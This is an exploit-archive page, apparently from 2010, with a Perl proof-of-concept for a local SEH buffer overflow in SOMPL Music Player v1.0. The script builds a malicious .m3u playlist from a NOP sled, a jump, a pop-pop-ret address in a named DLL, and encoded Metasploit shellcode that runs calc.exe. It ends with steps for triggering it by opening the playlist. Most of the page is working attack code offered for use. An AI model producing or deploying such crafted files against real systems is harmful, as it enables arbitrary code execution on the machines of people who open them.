Home / os / win7

SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)

Posted on 18 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================================
SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)
==========================================================

# Exploit Title: SOMPL Music Player v1.0 (.m3u) Local Buffer Overflow (SEH)
# Date: August 18, 2010
# Author: CG Tan
# Software Link: http://sourceforge.net/projects/somplmp3/
# Version: 1.0
# Tested on: Windows XP SP2 En, Windows XP SP3 En
# CVE : N/A
 
#!/usr/bin/perl
 
open FILE, &quot;&gt;exploit.m3u&quot;;
 
print FILE &quot;x90&quot; x 4148;
print FILE &quot;x90x90xebx04&quot;;
print FILE &quot;x8fx11x50x32&quot;;#pop pop ret @ S.O.M.PLcc3250mt.dll
 
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
#exclusions: 0x00 0x0a 0x0d 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0x7a
my $shellcode =
&quot;xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49&quot;.
&quot;x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36&quot;.
&quot;x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34&quot;.
&quot;x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41&quot;.
&quot;x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44&quot;.
&quot;x42x30x42x50x42x30x4bx58x45x34x4ex33x4bx58x4ex47&quot;.
&quot;x45x50x4ax47x41x50x4fx4ex4bx48x4fx34x4ax41x4bx58&quot;.
&quot;x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx38&quot;.
&quot;x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c&quot;.
&quot;x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e&quot;.
&quot;x46x4fx4bx53x46x45x46x32x46x50x45x37x45x4ex4bx38&quot;.
&quot;x4fx35x46x42x41x50x4bx4ex48x56x4bx38x4ex30x4bx44&quot;.
&quot;x4bx48x4fx55x4ex51x41x30x4bx4ex4bx58x4ex31x4bx58&quot;.
&quot;x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx41x43&quot;.
&quot;x42x4cx46x36x4bx48x42x44x42x53x45x58x42x4cx4ax57&quot;.
&quot;x4ex50x4bx38x42x44x4ex30x4bx48x42x37x4ex41x4dx4a&quot;.
&quot;x4bx58x4ax56x4ax50x4bx4ex49x30x4bx38x42x58x42x4b&quot;.
&quot;x42x50x42x50x42x50x4bx38x4ax46x4ex33x4fx35x41x53&quot;.
&quot;x48x4fx42x56x48x45x49x38x4ax4fx43x38x42x4cx4bx37&quot;.
&quot;x42x55x4ax36x42x4fx4cx48x46x30x4fx45x4ax36x4ax39&quot;.
&quot;x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x56x41x56&quot;.
&quot;x4ex46x43x46x50x42x45x56x4ax37x45x56x42x50x5a&quot;;
 
print FILE $shellcode;
 
close FILE;
 
#open SOMPL music player and click on the &quot;LL&quot; button to open the playlist exploit.m3u


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :